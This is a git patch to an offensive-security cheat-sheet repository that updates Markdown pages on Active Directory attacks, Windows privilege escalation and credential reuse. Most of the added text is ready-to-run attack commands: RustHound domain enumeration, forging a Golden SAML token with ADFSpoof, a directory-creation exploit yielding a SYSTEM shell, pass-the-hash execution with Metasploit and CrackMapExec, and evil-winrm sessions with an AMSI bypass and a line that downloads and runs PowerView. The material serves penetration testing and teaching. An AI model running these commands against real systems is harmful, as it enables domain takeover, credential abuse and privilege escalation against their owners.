From 5190829ab4b55cf2b98c29fc5bf2d4e65ac9d798 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 30 Dec 2022 11:01:31 +0100 Subject: [PATCH] RustHound Examples --- .../Active Directory Attack.md | 32 +++++++++++++------ .../Windows - Privilege Escalation.md | 13 +++++++- .../Windows - Using credentials.md | 25 ++++++++------- 3 files changed, 48 insertions(+), 22 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 4f3f119..a1f1f24 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -228,10 +228,11 @@ Use the correct collector * AzureHound for Azure Active Directory * SharpHound for local Active Directory +* RustHound for local Active Directory -* use [AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) +* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) -* use [BloodHound](https://github.com/BloodHoundAD/BloodHound) +* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) ```powershell # run the collector on the machine using SharpHound.exe # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe @@ -266,6 +267,15 @@ Use the correct collector certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123 ``` +* use [OPENCYBER-FR/RustHound](https://github.com/OPENCYBER-FR/RustHound) + ```ps1 + # Windows with GSSAPI session + rusthound.exe -d domain.local --ldapfqdn domain + # Windows/Linux simple bind connection username:password + rusthound.exe -d domain.local -u user@domain.local -p Password123 -o output -z + # Linux with username:password and ADCS module for @ly4k BloodHound version + rusthound -d domain.local -u 'user@domain.local' -p 'Password123' -o /tmp/adcs --adcs -z + ``` Then import the zip/json files into the Neo4J database and query them. @@ -2683,20 +2693,20 @@ Exploitation: #### ADFS - Golden SAML -Requirements: +**Requirements**: * ADFS service account * The private key (PFX with the decryption password) -Exploit: -* Use [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) to dump ADFS informations -* Convert PFX and Private key to binary format +**Exploitation**: +* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` +* Convert PFX and Private Key to binary format ```ps1 # For the pfx echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin # For the private key echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin ``` -* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) +* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). ```ps1 mkdir ADFSpoofTools cd $_ @@ -2711,10 +2721,13 @@ Exploit: pip install -e . cd ../ADFSpoof pip install -r requirements.txt - python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls + python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' ``` +Other interesting tools to exploit AD FS: +* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) + ### UnPAC The Hash @@ -4133,4 +4146,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) * [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) -* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) \ No newline at end of file +* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8e907f5..965efc3 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -55,6 +55,7 @@ * [DiagHub](#diaghub) * [UsoDLLLoader](#usodllloader) * [WerTrigger](#wertrigger) + * [WerMgr](#wermgr) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) * [MS08-067 (NetAPI)](#ms08-067-netapi) * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) @@ -1359,7 +1360,7 @@ If we found a privileged file write vulnerability in Windows or in some third-pa ### WerTrigger -> Weaponizing for privileged file writes bugs with Windows problem reporting +> Exploit Privileged File Writes bugs with Windows Problem Reporting 1. Clone https://github.com/sailay1996/WerTrigger 2. Copy `phoneinfo.dll` to `C:\Windows\System32\` @@ -1367,6 +1368,16 @@ If we found a privileged file write vulnerability in Windows or in some third-pa 4. Then, run `WerTrigger.exe`. 5. Enjoy a shell as **NT AUTHORITY\SYSTEM** +### WerMgr + +> Exploit Privileged Directory Creation Bugs with Windows Error Reporting + +1. Clone https://github.com/binderlabs/DirCreate2System +2. Create directory `C:\Windows\System32\wermgr.exe.local\` +3. Grant access to it: `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f` +4. Place `spawn.dll` file and `dircreate2system.exe` in a same directory and run `.\dircreate2system.exe`. +5. Enjoy a shell as **NT AUTHORITY\SYSTEM** + ## EoP - Common Vulnerabilities and Exposure diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index a2abf5a..9174183 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -105,7 +105,7 @@ use exploit/windows/smb/psexec set RHOST 10.2.0.3 set SMBUser username set SMBPass password -set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c +set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 set PAYLOAD windows/meterpreter/bind_tcp run shell @@ -115,25 +115,26 @@ shell ```powershell root@payload$ git clone https://github.com/byt3bl33d3r/CrackMapExec.github -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -x 'whoami' # cmd -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -X 'whoami' # powershell -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method atexec -x 'whoami' -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method wmiexec -x 'whoami' -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" -x 'whoami' # cmd +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" -X 'whoami' # powershell +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" --exec-method atexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" --exec-method wmiexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" --exec-method smbexec -x 'whoami' ``` ## WinRM -Require: +**Requirements**: * Port **5985** or **5986** open. * Default endpoint is **/wsman** +If WinRM is disabled on the system you can enable it using: `winrm quickconfig` + ```powershell -root@payload$ git clone https://github.com/Hackplayers/evil-winrm -root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] -root@payload$ ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' -root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -H BD1C6503987F8FF006296118F359FA79 -root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -p password -r domain.local +git clone https://github.com/Hackplayers/evil-winrm +evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] +evil-winrm -i 10.0.0.20 -u username -H HASH +evil-winrm -i 10.0.0.20 -u username -p password -r domain.local *Evil-WinRM* PS > Bypass-4MSI *Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1"))